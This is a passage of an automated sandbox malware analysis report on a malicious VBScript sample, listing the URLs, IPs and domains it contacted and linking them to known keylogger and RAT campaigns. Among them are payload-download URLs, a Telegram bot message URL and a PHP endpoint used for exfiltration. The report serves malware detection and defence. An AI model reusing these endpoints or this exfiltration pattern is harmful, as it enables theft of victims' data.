                                              https://duckduckgo.com/chrome_newtabOneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.orgOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/botOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://paste.ee/d/MQJcS_wscript.exe, 00000000.00000002.1463009577.000002BB936B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461792531.000002BB936B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.office.com/lBOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008D09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://analytics.paste.eewscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://paste.ee/d/MQJcSWwscript.exe, 00000000.00000003.1462205544.000002BB956B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://aka.ms/pscore6powershell.exe, 00000002.00000002.1993680537.000002380380F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=enOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://varders.kozow.com:8081OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://paste.ee/d/MQJcSRqMwscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.comwscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://paste.ee:443/d/MQJcSwscript.exe, 00000000.00000002.1463305435.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1460132187.000002BB9375A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.75$OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BDA000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchOneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://checkip.dyndns.org/qOneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://chrome.google.com/webstore?hl=enlBOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1993680537.000002380385E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://secure.gravatar.comwscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BB0000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.office.com/OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008D0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoOneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com;wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://sws.swpushroller.euOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://checkip.dyndns.orgOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20aOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://paste.ee/UqBwscript.exe, 00000000.00000003.1459934063.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463164528.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461721432.000002BB93727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1458797095.000002BB93727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.ecosia.org/newtab/OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://aborters.duckdns.org:8081OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://51.38.247.67:8081/_send_.php?LOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anotherarmy.dns.army:8081OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://analytics.paste.ee;wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://reallyfreegeoip.orgOneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008BB0000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://sws.swpushroller.eu/swsk/api.phpOneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.1993680537.000002380382A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://3105.filemail.compowershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedOneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          149.154.167.220
                                                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                          45.80.158.30
                                                                                                                                          		sws.swpushroller.euNetherlands
                                                                                                                                          		13213UK2NET-ASGBfalse
                                                                                                                                          193.30.119.205
                                                                                                                                          		ip.3105.filemail.comunknown
                                                                                                                                          		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                                                                                                                          193.122.6.168
                                                                                                                                          		checkip.dyndns.comUnited States
                                                                                                                                          		31898ORACLE-BMC-31898USfalse
                                                                                                                                          104.21.84.67
                                                                                                                                          		paste.eeUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          5.182.211.149
                                                                                                                                          		sbv.pushswroller.euNetherlands
                                                                                                                                          		64425SKB-ENTERPRISENLtrue
                                                                                                                                          172.67.177.134
                                                                                                                                          		reallyfreegeoip.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1562920
                                                                                                                                          Start date and time:2024-11-26 09:31:52 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 6m 38s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:Doc261124.vbs
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winVBS@8/6@7/7
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 91
                                                                                                                                          • Number of non-executed functions: 51
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .vbs

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7928 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: Doc261124.vbs

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          03:32:52API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                                                                          03:32:53API Interceptor70x Sleep call for process: powershell.exe modified
                                                                                                                                          03:33:23API Interceptor927692x Sleep call for process: OneDriveSetup.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          149.154.167.220RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                      INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                                          2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                            Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              193.30.119.205New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                  Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                    OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      193.122.6.168RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                                      rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • checkip.dyndns.org/

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      ip.3105.filemail.comNew RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      paste.eeMT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.187.200
                                                                                                                                                                      Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                      • 172.67.187.200
                                                                                                                                                                      asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                      PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                      • 172.67.187.200
                                                                                                                                                                      LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                      • 172.67.187.200
                                                                                                                                                                      PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 172.67.187.200
                                                                                                                                                                      DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      reallyfreegeoip.orgPACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 104.21.67.152
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 104.21.67.152
                                                                                                                                                                      INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134

                                                                                                                                                                      ASNs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      ORACLE-BMC-31898USRemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                      jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                      tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 193.123.91.33
                                                                                                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                      TELEGRAMRURemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 149.154.167.220
